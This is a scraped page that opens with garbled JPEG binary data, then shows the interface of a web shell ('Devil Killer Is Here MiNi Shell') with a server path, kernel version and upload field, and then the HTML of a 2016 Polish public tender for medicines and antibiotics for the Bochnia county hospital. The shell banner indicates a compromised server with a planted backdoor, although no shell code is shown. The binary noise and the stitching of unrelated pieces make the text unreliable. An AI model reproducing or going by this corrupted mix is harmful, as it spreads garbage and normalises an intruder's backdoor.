JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160720/147061-N-2016.html

<p class="kh_header"><b>Bochnia: Dostawa produktów farmaceutycznych 
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 147061 - 2016; data zamieszczenia: 20.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów farmaceutycznych 
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.2)	Przedmiot zamówienia został podzielony na 7 pakietów:
Pakiet nr 1 - Produkty farmaceutyczne
Pakiet nr 2 - Antybiotyki, Chemioterapeutyki 1
Pakiet nr 3 - Preparaty do żywienia pozajelitowego
Pakiet nr 4 - Preparaty i sprzęt do leczenia żywieniowego drogą przewodu pokarmowego
Pakiet nr 5 - Gąbki żelatynowe
Pakiet nr 6 - Albuminy
Pakiet nr 7 - Zestaw do dializ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże posiadanie uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj. zezwolenia na prowadzenie hurtowni farmaceutycznej wydanego przez Głównego Inspektora Farmaceutycznego lub zezwolenie na wytwarzanie produktów leczniczych (w przydatku producenta) wydane przez Głównego Inspektora Farmaceutycznego zgodnie z wymogami ustawy z dnia 6 września 2001r. Prawo Farmaceutyczne (Dz. U. z 2008r., Nr 45, poz. 271 ze zm.),
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę dokument, o którym mowa w punkcie III.4.1) ppkt. 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">III.5.1)	Oświadczenie Wykonawcy o spełnianiu wymagań przewidziane w ustawie z dnia 6 września 2001r. Prawo Farmaceutyczne (tekst jednolity Dz. U. 2008 nr 45 poz. 271 z poz. zm.) oraz w ustawie o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2010 nr 107 poz. 679 z poz. zm.) oraz w aktach wykonawczych do niej, a także w obowiązujących przepisach Unii Europejskiej. (według wzoru z załącznika nr 5).
III.5.2)	Oświadczenie o spełnianiu wymagań wynikających z regulacji art. 9 ust. 1 i 2 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (Dz. U. 2011 Nr 122, poz. 696 z poz. zm.) (według wzoru z załącznika nr 6)

Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę
Zamawiający oceniać będzie spełnienie potwierdzenia że oferowane dostawy odpowiadają określonym wymaganiom, w oparciu o przedstawiony przez Wykonawcę dokument, o którym mowa w punkcie III.5) Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1)	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
III.6.2)	Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostaw częściowych - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a.	nazwy produktu przy zachowaniu jego istotnych parametrów,
b.	sposobu konfekcjonowania,
c.	numeru katalogowego poszczególnych Towarów 
d.	dostarczania innego produktu, przy zachowaniu jego istotnych parametrów, w przypadku ograniczenia dostępności produktu objętego umową, w szczególności zakończenia produkcji oferowanego produktu, wygaśnięcia rejestracji oferowanego produktu, zakazu używania danego produktu wydanego przez właściwy organ. 
e.	zmiany terminu realizacji w przypadku nie zrealizowania wartości umowy na poziomie min. 60% w terminie jej obowiązywania, przewiduje się możliwość jej przedłużenia o czas niezbędny do zrealizowania ww. wartości. Przedłużenie terminu obowiązywania umowy może nastąpić na wniosek każdej ze stron. W przypadku braku zgody jednej ze stron na przedłużenie obowiązywania umowy, Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu zmniejszenia Zamówienia.
3.	Wykonawca powinien wykazać okoliczności, o których mowa w ust. 2 .
4.	Wykonawca w sytuacji określonej w ust. 2 pkt d, w porozumieniu z Zamawiającym zaproponuje, w terminie do 5 dni od powzięcia informacji o okolicznościach tam wskazanych, produkt równoważny na zasadach wynikających z ust. 7, z zachowaniem formy pisemnej lub mailowej pod rygorem nieważności.
5.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę ceny za zbiorcze opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w stosunku do ceny jednostkowej poszczególnych Towarów objętej umową
6.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny brutto ulegają zmianie w przypadku wzrostu/spadku:
a.	cen urzędowych,
b.	obowiązujących stawek podatków i opłat granicznych. 
W przypadku urzędowej zmiany stawki VAT, uwzględnienie nowej stawki nastąpi automatycznie w dacie określonej przez właściwe przepisy prawa, bez konieczności zawierania odrębnego aneksu. 
7.	W przypadku zmiany cen produktów leczniczych ujętych w wykazie refundowanych leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (dalej: lista leków refundowanych) Zamawiający dokonywać będzie zakupu produktu po cenie urzędowej obowiązującej w dniu wystawienia faktury, z zastrzeżeniem, iż % różnica w stosunku do ceny urzędowej zastosowana przez Wykonawcę w ofercie, w odniesieniu do poszczególnych produktów, obowiązywać będzie w trakcie realizacji umowy po każdej zmianie cen urzędowych.
8.	Za zgodą Zamawiającego Wykonawca może zaoferować odpowiednik, po cenie nie wyższej niż cena produktu objętego umową z zastrzeżeniem § 2 ust. 10. 
9.	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny.
10.	Zaistnienie okoliczności wymienionych w ust 7-8 nie wymaga sporządzenia aneksu.
11.	W przypadku zmiany bądź rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest niezwłocznie w formie pisemnej wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej
32-700, Bochnia
ul. Krakowska 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2016 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Produkty farmaceutyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Krem chroniący skórę przed działaniem płynów ustrojowych, jednocześnie ją nawilżając, stosowany w celu zapobiegania uszkodzeniom nienaruszonej skóry.	Krem zawiera dimetikon, wodę, adypinian kaprylu, olej kokosowy, eter stearylowy polipropyloglikolu (15), glikol dipropylenowy, palmitynian izopropylu, olej mineralny, kopolimer etylen/kwas akrylowy, terpolimer akrylanu, parafina, siarczan magnezu, glikol propylenowy, zapach, diazolidynylomocznik, metylparaben, propylparaben; 1 op x 28 g	op	6
2.	Wodny roztwór oksydantów o działaniu antybakteryjnym, służący do odkażania i płukania ran ostrych oraz przewlekłych, takich jak: owrzodzenia goleni, odleżyny, rany w przebiegu zespołu stopy cukrzycowej. 	Woda oczyszczona, Podchloryn sodu (NaOCl) 004%, Kwas podchlorawy (HOCl) 0,004%, opak. 500 ml	op	5
3.	Heparinum	żel 1000 j.m./g x 50 g	op	10
4.	Oxycodon	inj. 0,01g/ml x 10 amp	op	5
5.	Oxycodon	inj. 0,02/2ml x 10 amp	op	5
6.	Naloxon + Oxycodon	10 mg + 5mg x 30 tabl.	op	30
7.	Metamizol sodu	inj. 1g/2ml x 5 amp	op	200
8.	Kolagenaza N	maść 1,2 j./g 20 g	op	15
9.	Morphini sulfas 	amp. 0,01g/ml x 10 amp	op	10
10.	Saccharomyces boulardii	kaps. 250 mg X 50 szt	op	30
11.	Rosuwastatyna	tabl.powl. 5 mg x 28 tabl.	op	3
12.	Rosuwastatyna	tabl.powl. 20 mg x 28 tabl.	op	1
13.	Rosuwastatyna	tabl.powl. 40 mg x 28 tabl.	op	1
14.	Rosuwastatyna	tabl.powl.10 mg x 28 tabl.	op	3
15.	Vitaminum B compositum	tabl. draż x 50 tabl.	op	3
16.	Racecadotril	granulat do przygotowania zawiesiny 10 mg x 16 saszetek	op.	10
17.	Racecadotril	granulat do przygotowania zawiesiny 30 mg x 16 saszetek	op	10
18.	Rifampicyna	kaps. 150 mg X 100 kaps.	op	1
19.	Rifampicyna	kaps. 300 mg X 100 kaps	op	1
20.	Tobramycyna	inj. 0,24g/80ml x 10 flakon	op	1
21.	Esomeprazol	inj. 0,04g x 10 fiolek	op	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.01.2017.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Antybiotyki, Chemioterapeutyki 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Cloxacillin	tabl. 0,5 g x 16	op	1
2.	Cloxacillin	fiol. 1 g x1	op	10
3.	Chloramphenicol  	maść 2%  - 5 g x 1	op	14
4.	Clarithromycin	fiol. 500 mg x 1 	op	110
5.	Benzylpenicillin	fiol.3 Mj.m x 1	op	20
6.	Metronidazole + chlorquinaldol /np. Gynalgin/                   	globulki a 0,25g + 0,1g x 10	op	14
7.	Neomycin	tabl. 0,25 g x 16	op	10
8.	Nystatin      	zaw. 2400000 j /24ml/5g  x 1	op	40
9.	Fluconazole	r-r d/infuzji 2 mg/ml-100ml x 1	op	240
10.	Imipenem / Cilastatin  	fiol  0.5g dożylny x 1	op	240
11.	Ampicillin 	fiol 1g x 1	op	780
12.	Ampicillin / sulbactam 	fiol 1,5 g x 1	op	50
13.	Doxycycline	 kaps 0.1g x10	op.	9
14.	Doxycycline	fiol 0.1g /5 ml x 10	op	36
15.	Lewofloksacyna	tabl. powl. 500 mg x 10	op	1
16.	Lewofloksacyna	5 mg/ml - fl 100ml	op	20
17.	Meropenem	fiol 1 g x 1	op	270
18.	Garamycin gąbka 	5 cm x 5 cm	op	1
19.	Garamycin gąbka 	0,13g/10 x 10 x 0,5 cm	op	1
20.	Piperacilin, Tazobactam	proszek do sporządzenia roztw do infuzji 4g+0,5g fiolka	fiolka	60
21.	Linezolid	0,6 G /300 ml	worek	10
22.	Amphotericin B	proszek do przygot roztw do wlewu doż 50 mg	op.	20
23.	Azitromycinum	kaps 250 mg x 6	op.	1
24.	Azitromycinum	tabl powl 500 mg x 3	op.	14
25.	Cefuroxime axetil	 pr.d/sporz.zaw 125mg/5ml 50ml	op.	2
26.	Cefuroxime axetil	 pr.d/sporz.zaw. 250mg/5ml 50ml	op.	3
